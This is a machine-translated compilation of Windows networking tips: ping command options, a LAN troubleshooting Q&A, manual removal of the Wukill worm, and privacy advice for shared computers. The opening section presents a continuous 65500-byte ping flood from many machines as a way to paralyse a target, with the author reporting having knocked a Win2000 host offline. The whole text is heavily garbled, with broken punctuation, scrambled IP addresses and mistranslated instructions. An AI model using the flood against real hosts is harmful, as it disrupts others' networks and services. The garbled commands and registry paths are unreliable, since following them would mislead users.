Pinging 192。.168。.1。.21 with 65500 bytes of data: 。.
Reply from 192. .168. .1. .21: Bytes = 65500 time <10ms TTL = 254. .
Reply from 192。.168。.1。.21: bytes=65500 time <10ms ttl=254 。. ttl="254">
... ... ... ... ... .... .
So it will never stop to .1 .168.192.. .21 computer to send the packet size 65500byt, if you have only one computer may have no effect, but if you have a lot of your computer so you can make each other completely paralyzed, I have done such a test when I use 10 or more computers to ping one Win2000Pro system when the computer is less than 5 minutes of each other's network has been completely paralysed, network jams, HTTP and FTP services to a full stop, it can be seen that the power of the small matter.
-F Set Don `t Fragment flag in packet. .
In the packet send "don't fragment" flag.
In general you will send the packet through the routing section and then sent to each other, with this parameter will not be re-routed after the section dealing with. .
-i TTL Time To Live。.
TTL value specifies the system where to stay in each other's time. .
This parameter is to help you check the functioning of the network.
-V TOS Type Of Service. .
"The service type" field is set to the value specified by the tos.
-R count Record route for count hops. .
In "record route" field in the outgoing and return packet routing.
In general, you send the data packet is routed through before reaching the other side one by one, but in the end, what route it is the result? With this parameter you can set the route through which you want to detect the number, but limited in the 9, that you can follow to 9 Lu You, if you want to probe more, can be achieved by other commands, I will In a future article to explain to you. The following is an example:. .
C:\ > ping-n 1-r 202.9. .105. .101 .96 (sending a packet, the maximum number of recording nine routes).
Pinging 202. .96. .105. .101 With 32 bytes of data:. .
Reply from 202。.96。.105。.101: bytes=32 time=10ms TTL=249 。.
Route: 202. .107. .208. .187 ->. .
202. .107. .214-.210. >.
61. .153. .112. .70 ->. .
61. .153. .89-.112. >.
202. .96. .105. .149 ->. .
202. .97 .105. .96.->.
202. .96. .105. .101 ->. .
202. .96. .150-.105. >.
61. .153. .112. .90. .
Ping statistics for 202。.96。.105。.101: 。.
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),. .
Approximate round trip times in milli-seconds: 。.
Minimum = 10ms, Maximum = 10ms, Average = 10ms. .
From above, I can see from my computer to 202. .96. .105. .101 had adopted a total of 202. .107. .208. .187, 202. .107. .210. .214, 61. .153. .112.61. .153 .70,. .112. .89, 202. .96. .105. .149, 202. .97 .105. .96. the route.
-S count Timestamp for count hops. .
Specifies the count specifies the number of hops in the timestamp.
This parameter and the-r similar, but this parameter does not record the data packets back to the route through which up to only record 4. .
-j host-list Loose source route along host-list。.
Using computer-list specifies a list of computers to route packets. Continuous computer can be separated by intermediate gateways (sparse source routing) IP to allow the maximum number is 9. .
-k host-list Strict source route along host-list。.
Using computer-list specifies a list of computers to route packets. Continuous computer can not be separated by intermediate gateways (Strict Source Routing) IP to allow the maximum number is 9. .
-w timeout Timeout in milliseconds to wait for each reply。.
Specified timeout interval, in milliseconds. .
This parameter does not have any other skills.
ping command, other techniques: in general can also ping the other side to the other side returned to the TTL value of your size, roughly determine the target host system type is Windows family or the UNIX / Linux series, in general, the system returns Windows Series between the TTL value in the 100-130, while the UNIX / Linux systems series TTL values returned between 240-255, of course, the value of TTL in the other host can be modified, Windows family of systems can modify the registration table to achieve the following key:. .
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters] 。.
"DefaultTTL" = dword: 000000ff. .
255---FF 。.
128 --- 80. .
64-40.
32 ---- 20. .
Well, the ping command is basically completely explain the finished, there are-j,-k parameter I haven't details, for some reason also include my own the information collected here is too small to explain, please forgive me, if you read this article to friends among them, know more than me, as well as other skills would also like you to tell me, and in this first thanked him.
LAN applications in the thematic answers (Rayi Hibi). .
1. q: I have access to a computer in LAN, why often be prompted to enter a user name and password?.
A: This is mainly to security concerns. And when you restart your computer again, enter the user name and password, it does make people feel a lot of trouble. .
You just need to file shares on a computer that has a same user name, and use the same password, and then the computer in the LAN will use this username and password so that access each other in the network neighborhood computer does not need to enter a user name and password.
2, Q: Internet browsing before IE LAN should be how to set? . .
A: in the LAN proxy server in the Internet browser when the browser to make the necessary settings. In IE, for example, in your browser's proxy server settings by using the mouse to right-click on the IE icon on the desktop, right-click on the pop-up menu, select "Properties" command. In the open "Internet Properties" dialog box, select the "connect", then click "LAN settings" in the "local area network (LAN) settings" dialog box, select the "use proxy server" and enter the address of the proxy server and port.
The default for HTTP, FTP browser is using the same proxy server settings, if these services have different agents, you need other settings. .
Method: click on the "Advanced" button, cancel the "for all protocols that use the same proxy server", different services, enter their address and port, save the above settings, IE can use a proxy server on the Internet.
3 Q: How do I set the LAN send and receive messages OutLook Express? . .
A: in OE, email software can also be connected to the Internet through a proxy server, but can no longer use the original single dial-up settings. But relative to other software for the proxy server settings, mail settings for the server software to be more specific, the proxy must be of type Socks4 and Socks5 servers. Assumptions used by the proxy server's address is: 202. .102. .49. users of .141 mail address is: jjxm @ .com. 163.
Then the proxy server settings in OE methods: open OE, select the menu "Tools → Accounts." In the "Internet Accounts" select "Mail" tab, then select the account list, set up accounts, click on "Properties" button. In the Properties window, select the "Server" tab (Figure 1), the receiving and sending mail server address, enter the proxy server address (such as 202. .102. .49. .141), And click the "user name # email the real address used "naming rules, account name, enter" jjxm # POP3. .163..。.
4, Q: composed by the three computer LAN, in which I used on a computer after the Windows optimized master, why this computer can not log on network, and also not able to find dial-up adapter? . .
A: according to what you said, is "dial-up networking is not installed." The workaround is: in the "Control Panel" Add/Remove Programs ", select" Windows Setup "in the" components "and" communication ", select" dial-up networking ", and then drag the Windows installation disc into the CD-ROM drive for installation, restart your computer before you can use dial-up networking.
5 Q: How to set the LAN QQ, ICQ and other instant messaging software? . .
A: in QQ's main window click on the button "QQ2000", in the main menu, select "system parameters" in parameters window, select the "network settings" tab. First of all the types in the "Internet", select "Internet LAN access," and then select the "use a Socks5 proxy server", and then enter the server address and port (Figure 2), if the proxy server, set the user password, you also need to enter a user name and password. Then you can click on the "test" button to test the proxy correctly. Finally click "OK" in the proxy server to use QQ..
Similarly, in the ICQ, select "Connect" in the "firewall", you can define multiple proxy servers, such as Socks4, Socks5, HTTPS and so on. You must first identify and select the Shiyong proxy server type, then "代理 server" section, enter the host's address, port, if the proxy server set the user password, Huan must enter a user name and password. For the proxy server type, address, port, etc., not sure if you can ask your network administrator. .
6. q: I would like to use NetMeeting to LAN talk, how should I set?.
A: If you first open the NetMeeting, the software will automatically start the Configuration Wizard. In the Configuration Wizard window, click "Next", then enter your basic information (such as name, E-mail, etc.). Continue to click "Next", enter the server configuration window, NetMeeting allows startup to log on to the target server, this function is for ordinary Internet users, and LAN users do not need this feature, so you have to cancel the option. Continue to click "Next", select the network speed, you must select "LAN", then you are prompted to set up a shortcut, you can choose according to need.。.
7 Q: I know in the LAN can share files, but my question is, printers and scanners should be how to share? . .
Answer: first, that printer sharing methods. You can find in the local area network, a computer and the printer is attached to this computer, and then follow the instructions to install the printer driver. In the Windows system tray, click on "Start → Settings → Control Panel" in "Control Panel" window, double-click the "printer" icon, and then right-click the printer icon from the right-click menu, select the "share", and then open the printer properties "window" and select "sharing" and like to share files to be shared printers also have a share name, and then click OK.
Sharing settings on the scanner, you first of all to look at whether your network share scanner functions, is equipped with a driver for the share, that is only part of the network scanner can be shared. Also different types of scanners vary widely shared set, the best access to what the manual scanner. .
8, I used the extension line to the Internet, Internet speed maximum before 48000bps, why?, the Modem in the host box, powered (not open Modem power), home phone is in a busy state, how can I solve it?.
A: The first extension of a problem with your phone line or cable connection has a lot of quality, In addition, if the speed of your Modem can usually close to 48000bps, you will not be too concerned, it should focus first look at the actual download speed under Does that satisfy you. The second question, certainly, and you master the power accessories such as strong electromagnetic radiation and shielding the poor, if you do not want to host your big changes, it is best to use an object between the host and the Modem screen, or Modem point far away from your host, this is the best approach. .
9. my newly purchased network card cannot be installed on the computer, but on another computer using the normal, what's going on?.
A: If the network card installed on your computer, the system does not prompt to find new hardware, you can run the "Add New Hardware Wizard" to the system to search for new hardware. Method is to click "Start", point to "Settings", click "Control Panel", then double-click the "Add New Hardware." Follow the onscreen prompts. You can choose "Let Windows search for new hardware?", Click "Yes (recommended)" and then click "Next" to let the system find the card and then install the driver. .
But if any of the following network adapters or network cards, slot damage:.
1, "Add New Hardware Wizard" can not detect network card;. .
2. the "Add New Hardware Wizard" will be able to detect the network connection, but does not work.
In order to determine the card or the slot in the end is the problem, you can check the card is securely inserted into slots. If the card has been inserted into the slot securely into, please try to change a wall into the other slot. If the problem persists, it may be damaged or the card is not compatible with your computer, interchangeable. .
10, my computer is "network places" is not found in other networking computer failures, how to solve it?.
A: "My Network Places" is shown by the Working Group on the computer. If your computer does not set the workgroup name, open the "Network Neighborhood" when they may not see the other computers. Click the "Start", point to "Settings", click "Control Panel", double-click "network", and then click the "Identity" tab. All your LAN computer "working group" box should be the same as the name, if different you can type in this box the same workgroup name, then click "OK" to reboot the computer can. .
In addition, if the "Network Neighborhood" does not appear on the "entire network" icon, you may be in Windows is not installed the necessary network components. With other computers on the network to connect, you must install the following components: Microsoft network customer, network adapters, at least one network protocols (such as IPX/SPX, TCP/IP, etc.). To open the "network", check the "configuration" tab of the list, make sure that you have installed the necessary network components. If so, you can reinstall the various missing components.
11, Q: The company local area network, and only one machine connected to the Internet through the cat is like other machines connected to the Internet, how to achieve? . .
Answer: this is a typical proxy Internet problem. You can take the cat machines installed proxy surfing software (such as Sygate, Wingate, Winproxy) or directly use the Windows with shared Internet access feature Internet access (Windows 98 Second Edition and above have this feature). It is recommended that you use Sygate, the software is relatively simple. First dial-up, Sygate, after installation is finished, Sygate detects an Internet connection status, and automatic settings. . After setting, the other applications are not set. .
12. q: LAN ADSL via router, use of the Internet, how to make the way the various workstation quick access to the Internet IP address rather than manually to specify?.
A: If you are using Windows 2000, Windows 2000 can use the built-in dhcp function, first of all to establish a scope, and then add the DNS for the scope of the search order and router IP address, DNS search order for the local ISP's IP address, router's IP address that is set to the current LAN IP address of the router, not the specified IP address of other machines, such as the non-use of Windows 2000, you can use dhcp third-party software, such as proxy software sygate and wingate all functions with dhcp. .
13. q: companies to set up a local area network, you need to mail servers, and WWW server, both services onto a single computer or are using two computers are what software?!.
A: These two services are now more widely used, you can only use one computer or two can, of course, based on your specific budget and flow to decide. If the flow is not the case, recommended to use only one machine can.。.
14, Q: house originally had a PII computer, recently added a P4 machine, operating system is Windows 98 and has a network card installed, now I want them to share their resources together, how to do? . .
A: you referred to by the fact that the application of the broader now-to-peer network connections. Very simple, because you have a network card, so you need to do is to purchase suitable length CAT5e and 2 RJ45 Crystal head, and then go to lend a hand to play pliers. Then according to the standard one, i.e. the jumper is a standard used T568A (specific line arrangement are: white, green, blue, green, white, Orange, blue, white, Orange, white, Brown, Brown), a standard used T568B (white-Orange, Orange, white, green, blue, white, green, white, Brown, Brown). And then in the operating system to add the TCP/IP Protocol and Netbuei protocols, the Working Group is set to the workgroup, the computer cannot be the same.
15, Q: office machines desktop "My Network Places" icon is gone, to the Internet, but can not browse the resources on other machines, how do? . .
A: your Internet Properties intact, but the properties of the network neighborhood or my network places "Microsoft network users," a customer component no..
Into the "Control Panel", double-click "Network", the first network in the pop-up dialog box midpoint of the press "Add" button, and then from the subsequent pop-up "Select Network Component Type" dialog box, double-click the "clients", and finally from then the "Select Network Client" dialog box on the left select "Microsoft" and then select "Microsoft Internet user", "OK" and then "OK" and restart the computer, according to prompts on ok it! Before you go to solve this problem it ... .... .
16. q: office machines Desktop Network Neighborhood icon fixes and also be able to browse to the shared resources on other machines, but found that the right of the "share" command!?.
A: This is because also the lack of a "Microsoft network file and printer sharing" agreement which the network service! . .
First right-click on the desktop "network places" and select "Properties" dialog box, click the "add" button, and then from the subsequent pop-up "Select to install the network components" dialog box, double-click the "service", and finally, select from the following "network service" dialog box, select the "Microsoft network file and printer sharing" and "OK" and then "OK" and according to the prompt to restart the computer to ok!.
17 Q: Right in the "share" command has revealed himself! But I do not want to let others set up sharing from the Network Neighborhood to see this shared directory, only you know the remote machine and can achieve a fully operational authority. .
Answer: find what you want the shared folder and right-click the "shared"--I'm here to share "D:\Windows 98", for example, first select the "share" share name "after Windows 98 (and of course can also be renamed share OH)" with the English State "$" character, and then select the "full" and enter the password for the "set" and then "OK" once password is OK.
Thus, the absolute assurance that they can not see this from the Network Neighborhood shared directory! That ~ ~ they want from the remote machine to enter and how to achieve full operation do? Oh, so do: from the remote machine's address bar type "\ \ (machine name) \ $ (your shared directory name)" and "ENTER", then enter the password and confirmed, to enter it! So you can realize remote machine quietly set in its own fully operational within a shared directory it! But pay attention to where "\" can not mistakenly enter into a "/" Oh! ... ... Well, you had it? . .
18. q: a PCI 10/100 card that does not work. Mainly in the network, whether it be not Ping its IP address or IP address of the Ping each other, both have that happen. Viewing the NIC LEDs also has the same phenomenon.
A: First of all, you can check the connection port Hub is not broke, and the other port on the card received, if the problem remains the same, indicating Hub no problem. Then you can set with the test card with the procedures set view card of the relevant parameters, the IRQ is 5, go back to Windows 95/98 operating system, view the operating system, the parameter values assigned to the card, the IRQ 5 should be the same. In addition, you can check the motherboard to install the card slot is faulty, you can open the case, the card try another PCI slot.。.
19, Q: My computer connected with a peer, but can not read data from another computer, how is this going? . .
Answer: you could be a good resource sharing is not set: select "network → configuration → file and print sharing," adds two options all tick and determined that the installation was successful is configured in the "Microsoft network file and printer sharing" option, note that also check it and NetBEUI protocols are bound. Select the "configuration" in the NetBEUI protocol, click on "Properties" button to see the "Microsoft network in a binding on the file and printer sharing for Microsoft networks" and "user" is already on the hook. . .
20. q: my network upgrade to switch from the hub, the feeling of speed and improve what?.
A: This needs to be analyzed from the following aspects:. .
1. first you should make sure that the network is working in State 100M: confirm the network cabling is cat 5 network cable to the line above, follow standard practices, NIC support 100M 100M work status, only, the switch to work in the State, thereby 100M best reflects the performance advantages of the switch.
2, if the network is working correctly before the upgrade, not a big amount of data exchange, data, and broadcast storm phenomenon of conflict is not very frequent, then upgraded to enhance network performance may not be obvious, this is normal. .
3, another scenario is because the network structure is set incorrectly, for example, if the hub-and-drop in first-level connection server and switch to the next level to connect workstations, this data exchange is carried out through a hub, switch performance advantages not reflected. Therefore, the network should be taken fully into account the reasonableness of the network, it should be good equipment at the highest level of the entire network.
21, Q: VLAN what it means to use it any good? . .
A: the VLAN is a Virtual Local Area Network, or virtual local area network. VLAN Classification there are three ways: from the port (Port), based on MAC address and IP address. By dividing VLAN data exchange can be restricted to individual virtual network, thus reducing the entire network within the scope of the transmission of broadcast packets, improving the efficiency of the transmission network; at the same time, each virtual network cannot communicate directly, but must be forwarded by the router and played the role of isolated port to advanced security and control provides the potential to enhance network security. . .
22. q: my card only red light blinking, green light does not light, this situation is normal?.
A: First you should understand the general adaptive network card what the red and green represent the meaning of - the red light on behalf of Link / Act (connected / working), that is, a long bright red when connected, flashing when transmitting data; green light on behalf of FDX (full duplex), that is, full-duplex state of light, half-duplex state off. If a half-duplex network equipment (such as the Hub) and adaptive network card connected to the adaptive network card as this card, it will also work in half-duplex state, so the green light does not shine too is normal. .
Q: How do I use the switches in the UpLink port, how to connect using the UpLink port?, you can also use the nearest port of its adjacent?.
A: UpLink port is a common switch port, it is easy to switch between the two cascade ports. It and its adjacent normal UTP port using the same channel, so, if you use the UpLink port, and the other with the adjacent normal port no longer use. The two ports as shared ports, can not be used. Cascade, you can use the normal network cable (both ends of the wire follow the same standard, that is the same EIA / TIA 568A or 568B) to a common switch and another switch port UpLink port to link.。.
Standard Standard 568a 568b. .
Orange white 1 1 green and white.
Orange 2, Green 2. .
Green and white 3 orange white 3.
Blue 4 Blue 4. .
Blue and white, blue, 5 5.
Green 6 Orange 6. .
Brown 8 Brown 8. .
24. q: I have installed network card, in the "System → Device Manager" in the NIC has a yellow "!", I ask how to solve it?.
A: The card took place more easily with other equipment, resource conflicts, especially in systems with multiple cards installed in the case, the solution is:. .
1. replace the network card in the slot on the motherboard is the best solution.
2, in the card "Properties" window "Resources" tab to find "resource type" list, select the conflict "resources", click "Change Settings" button, change the IRQ conflict interrupt number or I / O addresses. .
3. some PCI network card are commandeering IRQ10, and some commandeering IRQ10 display card IRQ interrupt conflict occurred, if this is the case, in the BIOS will "Assign IRQ For VGA" entry is set to Disabled, not to the display card is assigned a fixed interrupt.
4, run the card with the floppy disk in the setup program, the card set to a non PNP mode, set the IRQ interrupt number and I / O address for the system does not occupy address; and the corresponding interrupt in the BIOS will be constructed by PCI / ISA to Legacy ISA. .
If you use the above method does not resolve the failure, it is recommended that you change one try.
25. . Q: ADSL Internet pages can not open the problem? . .
A: the MTU problem!, change the registry!.
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Class \ NetTrans \ 0000 \ primary key following the establishment of a string key named MaxMTU, key to 1450. .
Virus killing .Wukill I-Worm. (note that there are variant a) method of manual (smile).
I manually kill. Duba if does not work, not with the alarm. .
Start with process management tool (such as "master" with optimized process management tools) had suspicious process kill, and then search the 87KB ".EXE" file *., rising on the auto-start ".EXE" file MSTRAY. No, it seems there is a new variant, since the start of the file name can transform and sometimes each time you restart will become, not necessarily what directory in WINDOWS, so you want to search the entire size of not more than 87KB. .EXE file, and then save all icon for folder style. .exe files deleted. . Note: this step operation is dangerous, it is recommended by experienced personnel to operate. .
Then find the comment respectively. .htt and desktop. .ini, delete them all. Note do not put "*: under \My Documents" of the two files by deleting, generally there is a normal file (I'm using a stupid approach is to use Notepad to open and look out MICROSOFT stuff).
Finally restart the OK. .
Rising in the month of February will be able to kill, it seems to now duba, its destructive force is too small so dismissive duba??!!!???!!!!!.
Just looked at the previous posted and found this guy or variants become very fast. The biggest change is the change from the startup item, I have encountered this virus is the most powerful at the same time in memory have different file names of three processes, and the name of the item from the start has been changed, but WINFILE. . EXE the file will still exist and generally are in the root directory, and sit with the comment. . Htt and desktop. . Ini the two documents, and perhaps this can count as one of the landmark document.。.
Suspected of poisoning their own proposals, the "Hide extensions for known file types" option removed, if the folder icon. . EXE file, then Congratulations --------------- poisoned! ! ! ! ! . .
Other: normal WINFILE. .exe file size is 151419 bytes, and the icon is a cabinet style.
Saw a post on the Internet. I-Worm. . Wukill. .
Damage: this virus uses the folder icon is very intriguing. The virus is running, will own a large number of copied to another directory.
1, the virus will display first run "This File Has Been Damage!";. .
2. copy itself into the Windows directory, and renamed .exe Mstray.;.
Third, modify the registry:. .
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run 。.
Since the start in order to achieve its purpose;. .
IV. enumeration disk directory, at each of the following files in the root directory of the release:.
winfile. . Exe virus, the main program. .
Coment. use IE vulnerability .htt call the same directory as the .exe "winfile.", the property is hidden.
desktop. . Ini system to hide. Web browsing by folder, the system will call the file, the file called coment. . Htt, thereby activating the virus. .
5. viruses modify the registry, the hidden system files, hidden from the system files, hidden known extension name.
In this way, users do not see the coment. . Htt and desktop. . Ini, winfile. . Exe extension is hidden out, is the folder icon, the user easily view the folder and click. .
At the same time the virus in the current path generated its own copy of the name uses a directory, or the current window's title, an increase of concealment.
6, the virus is called Outlook to send a letter carrying the virus. .
You first try:.
1 [in the running to input REGEDIT (into the Registry Editor) points in the editing tools in Kyrgyzstan to find lost winfile determined that the output winfile. . Ini delete it and then return to tray and can be removed! ]. .
2 use the KV2004 upgrade version on the Internet for the latest upgrade, run KV2004..
Use Ping command determine network failure (sindasun). .
Ping is the Windows series comes with an executable commands. Use it to check if the network is able to use well connected, it is a good way to help us analyze the judgment network failure. Application form: Ping IP addresses. This command can also be combined with a number of parameters to use, type ping press ENTER to see the detailed description.
# 1 1. . Ping the machine IP. .
For example native IP address is: 172. .168. .200. .2. Then execute the command Ping .168.172. .200. .2. If the network adapter is installed and configured without problems, there should be similar to the following appears:.
Replay from 172. .168. .200. .2 bytes = 32 time <10ms. .
Ping statistics for 172。.168。.200。.2。.
Packets Sent = 4 Received = 4 Lost = 0 0% loss . .
Approximate round trip times in milli-seconds。.
Minimum = 0ms Maxiumu = 1ms Average = 0ms. .
If in MS-DOS mode to execute this command displays the contents of the Request timed out:, the NIC installation or configuration problem. Disconnect the cable from the network again if you execute this command displays properly, then the this computer uses the IP address may be associated with another is using the IP address of the machine. If it still does not function properly, the native card installation or configuration problem, you will need to continue to check the network configuration.
# 1 2. . Ping the gateway IP. .
Assuming that the gateway IP: 172. .6 .1 .168.., execute the command Ping .168.172.. .6 .1. In MS-DOS mode if you execute this command is similar to the following information appears:.
Reply from 172. .168. .6. .1 bytes = 32 time = 9ms TTL = 255. .
Ping statistics for 172。.168。.6。.1。.
Packets Sent = 4 Received = 4 Lost = 0 0% loss . .
Approximate round trip times in milli-seconds。.
Minimum = 1ms Maximum = 9ms Average = 5ms. .
The LAN gateway router is running normally. On the other hand, there is a problem with the gateway.
# 1 3. . Ping a remote IP. .
This command allows you to detect the native functionality to access the Internet. For example, the local telecom operator's IP address is: 202. .102. .48. .141. In the MS-DOS mode command execution: Ping 202. .102. .48. .141, if the screen shows:.
Reply from 202. .102. .48. .141 bytes = 32 time = 33ms TTL = 252. .
Reply from 202。.102。.48。.141 bytes=32 time=21ms TTL=252。.
Reply from 202. .102. .48. .141 bytes = 32 time = 5ms TTL = 252. .
Reply from 202。.102。.48。.141 bytes=32 time=6ms TTL=252。.
Ping statistics for 202. .102. .48. .141 . .
PacketsSent=4Received=4Lost=00% loss。.
Approximate round trip times in milli-seconds . .
Minimum=5msMaximum=33msAverage=16ms。.
indicates normal operation, the normal access to the Internet. On the contrary, it indicates that the host file (windows / host) problems. .
Things to watch out for the rush:: shock after the DNS server are all prohibited PING of the ICMP protocol is turned off.
So that we can use this command to trace packets TRACERT also can achieve the same purpose. .
Beware of computer exposed your privacy (sindasun).
If you are using the office, Internet cafes and other places of public use machines, you may be exposed to many secret front of others. .
# 1 a, the operating system.
If you want to belong to the privacy of images, video clips, documents or important documents stored in public computer, many people take the approach to the file or folder attributes to "hidden", and then they are not hiding in a computer folder from the eye. Win 98 in the "Start" → "Document" menu will be documenting the recent documents opened in the 15 name, so other people can click on the file name to open the file, even if you hide files Yi Jing Ba Le, and others can From here you spy on the secret. .
Solution: to clear these traces, you can use the right mouse button click on the "Properties" on the taskbar, click the "Start menu programs", and then point the "clear" to remove the "document" menu, content and other individuals in the history list. This is done to a certain extent to the protection of your privacy, but others can also be started via the "," menu's "find" feature to search for your important files, file types to your hard disk, all the graphic files *. * .txt, .doc file, found. ', and then in one view, the disclosure of secret remains possible.
Newspapers have introduced a modified approach to the hard disk hidden registry, hidden file that is specific to put a hard drive (such as the F drive), and then modify the registry to hide the tray (in the HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer Create a new Dword value under the "NoDrives", then set the key value, for example, key 20 can be set to hide F drive), in Explorer to see this set up.。 However this approach has a major vulnerability in DOS, this disk can be fully visible in Windows, I found a very easy way to break this limit. As long as in "my computer" or IE browser's address bar, type the letter "F", and then call: enter the disk contents at a glance, all the secrets of the lost.
Solution: If the high requirements of confidentiality, you can use some software to encrypt or hide, you can basically solve the question of confidentiality. However, even with the encryption / hiding software is not very safe. On the one hand there are some hidden software vulnerabilities, computer users are familiar with is not hard to break limitations; on the other hand a number of encryption / hide the encryption software is not high, can be found in the corresponding software to crack passwords. So for a very high confidentiality requirements of users, if relatively small files, it is best not to save on your hard drive, can be saved in a floppy disk, if the file is too large can not be stored in a floppy disk, you can use PGP like the ultra- strong encryption software to encrypt.
# 1 second, commonly used programs.
Many applications under Windows, such as Word, Excel, Media Player Media Player, RealPlayer, etc., will be in the program "File" menu, following the recently opened some of the file name. Although you have to file hiding somewhere in the computer, but people can still easily through the file name list to open the corresponding file. .
Solution: for Word 2000, Excel 2000, you can in Word/Excel's "Tools" → "options" and "General" tab in the "recently used file list" the number of changed to 0; Media Player and Realplayer, clear the history, you can only remove the registry, to clear the history in Realplayer, to HKEY_LOCAL_MACHINE\Software\CLASSES\Software\RealNetworks\Realplayer\6. . To clear the record on media player only to the registry, delete HKEY_HKEY_CURRENT_USER \ Software \ Microsoft \ MediaPlayer \ Player \ RecentFileList under the key. History through the registry to remove too much trouble, but newcomers have certain risk. .
Flexible solution that is: in this video clip to the Realplayer or Windows Media Player, and so does not support the extension of false. For example, you just watch the video file name called 123. .mpeg, you can put it in the file name to .dhl sdk., and then put it back reservoir inconspicuous to the other folder, it is best to stay away from the original folder. Although the original record remains in the "file" menu, but the Realplayer, Media Player could not find the file. The next time you want to watch it again, you can modify the file name extension. . By contrast Yahoo! Player will do much better in this regard, you can go to Yahoo! Player of the "Edit → Prefenrence → General" in check "On exit, clear history (clear history on exit)", so every time you shut down after the Yahoo! Player will automatically clear the history. .
# 1 third, IE browser.
If you are Internet users, but also be aware of your secret got out. IE browser will record your visit to the site's address, other people can see through the historical records. .
Solution: If you do not want to let others know that you can click on the browser's "Tools → Internet Options → General" tab in "clear history".
For those who send and receive e-mail by logging onto Web users who read a letter from someone you can easily see that this is a very serious security issues been widely ignored. Those who access the Internet in Internet cafes to be especially careful, and maybe you Powell left, those people with ulterior motives to seeing you on the secret. By clicking on the browser's "history" button, you can see the most recently accessed pages of records. Prior select "work offline" situation, and then click the E-mail the page, others can see you have read the letter! . .
Solution: to resolve this vulnerability, an purge history alone is not enough, others even through history do not see your access logs, but can go to C:\Windows\Temporary Internet Files folder to view all content. The key is to put the contents of this folder, you can click on the browser tool "→" Internet Options "," "General" tab of "delete files" to delete all offline content.
You may find that when you use the mouse to click on e-mail username box, it will list have entered the e-mail address; when you click on the email subject line, you may e-mail lists have entered the title ; when you write posts in the forum when the title bar will have entered some of the listed titles. All of these forms may have leaked the information you do not want others to know. IE browser has the "AutoComplete" function stores had previously typed entries, so the next time you fill in the form of time, will automatically be consistent with the items listed. .
Solution: to clear the log, you can click on the IE browser's "Tools" → "Internet Options" → "contents" tab in the "auto complete", then "clear form" to clear AutoComplete history.
# 1 4, Web chat and e-mail. .
When you are in chat rooms, forums, nonsense, don't think that nobody knows where you are from, your IP address has already been recorded. When you use QQ chat when there are ways to know your IP address, as long as the downloading install a check IP address of a gadget, you can see your IP address, and then through the "Chase" software to detect where you are (the likelihood of false positives), so don't wonder how someone will know your geographic location.
Solution: If order to hide their IP address, the most effective or the Internet through a proxy server. .
Today network hacking tools (Trojans), flooding, not a true hacker also can remotely control your computer, steal your information. When others use QQ or E-mail to send photos or songs, perhaps you are receiving a Trojan horse program. Computer if the Trojan program, it is no secret at all.
Solution: To prevent hacker programs, in addition to not download unsolicited software, install a firewall and anti-virus program is the most effective measures. If you are very sensitive to network security, should also pay attention to the Windows System security holes patched. .
You not only to prevent from online dangers that you want to prevent the theft from reality. In more cases, talent is really the most dangerous people. Now many people are chatting with QQ, QQ is revealing the secret of becoming the main channel. Tools for QQ steal, stealing passwords, you can peek into the chat, etc., was difficult.
Solution: If you are using Internet cafes and other public places, QQ, chat after the chat is best to remove. Delete chat history There are two main ways, if you are not familiar with the computer, you can click on QQ's "news management" in the pop-up "message manager" window using right click on your number (in the upper left corner), then "delete message", you can delete all chat history, chat history if you think these are important to you want to save it, you can "message management", right click on your number, then click "Export chat history to text file ", to back them up to a floppy disk or sent to your mailbox stored on the hard disk and then delete the chat history.。.
Internet access in public places, be careful QQ number theft, QQ number theft phenomenon can still continue. .
Solution: to prevent QQ password is stolen, you should also note that: as soon as possible the QQ to upgrade to more secure and better informed of the latest version. In addition it is best not to birthdays, name, phone number and other personal information to use as a password, the password should be complex, not regular replacement, of course, to facilitate your memory. It is best to add digital plus English punctuation, 8 ∽ 16 bit the most appropriate. If your password length is short or too simple, easily QQ password guess solution in a short time and guess work out. After you set up a password you can request to Tencent website password protection feature, is stolen easily retrieve password.
Now spread some of QQ online password-stealing software, run it after the login and password you QQ the same time record the password to a file, is difficult to prevent such software, you not only pay attention to QQ password stolen, your Other stolen passwords have to be careful. To many people the easy way e-mail, and QQ is the same password, but this serious security risk, because once a password stolen, they fall across the board had. To completely prevent someone steal your password, really not easy.。 To find this kind of software is very difficult to trace, this type of program is running, press "Ctrl + Alt + Del" also cannot see the anti-virus software does not monitor such software. There is no good way to find this kind of monitoring software.
Jiejue program: to Control Panel "Add / Remove Programs" property to see if there is nothing suspicious inside the program; another Jiu Shi from the "Start" menu in the "Run" in type "msconfig", in the open "system configuration program, "the" start "key, look up there any suspicious startup items. But these methods are not reliable.。 To prevent this type of program was really hard, so that you are unable to, you are not aware of the secret was revealed. You have a secret?, in fact, you have no ... ....
Recommended] Internet information security laws to prevent skills 13. .
The late 1990s the INTERNET marks a human society has entered the information age, in this era, more and more people have started without the Internet network. However, in the current Internet environment, a gentleman and trust therr. The community can find all the dangerous, dirty and speculation on the Internet. From the date of the birth of the Internet, particularly since the 1990s, it was open to the public, it has become the target of public criticism. . This is because we pass the form to register and submit personal information, the program will send information packages to the destination, in the course of transmission to the destination need to transit through a series of sites, of course, information to be transmitted very easily network through which left traces of their own, if these clues unfortunately intercepted by some people with ulterior motives, and make use of big trouble - although this probability is low, they meet today for a free no rules and regulations 2 , still significantly disordered network, the total should be more careful. Now, I will provide some protection for individual users of online information security methods and measures in the hope of you the user. .
1. does not run the program do not know the truth.
If you receive an e-mail with an attachment, and attachment is a class extension EXE file, then must not hastily run it, because the program know the truth, there may be a system failure procedures . Attackers often the system of undermine the process a name change by e-mail sent to you, and with some deceptive subject, lie some of you said: "This is good stuff, you must try," "help me to test procedures "to the group. You have to guard it! Very friendly towards the surface, with good e-mail attachments, we should do is to immediately delete these files from unknown sources. .
2, Shield of cookie information.
cookies is Cookie, it is the Web server sends to a computer data file, which records such as user names, passwords and information on the orientation of user interest. In fact, it makes you very convenient access to the same site, for example, do not re-enter the password. However, personal information collected by Cookies may be some like to engage in "trick" people use, it may pose a security risk, so that we can do in your browser settings necessary, ask the browser to alert you before accepting Cookie, or simply reject them.。 As time goes by, more and more Cookie information may, of course, our heart is therefore becoming increasingly uncertain. Sure, these existing Cookie information should immediately purged from your hard disk, and resize in the browser Cookie settings to allow your browser to refuse to accept Cookie information. . .
3 different places with different passwords.
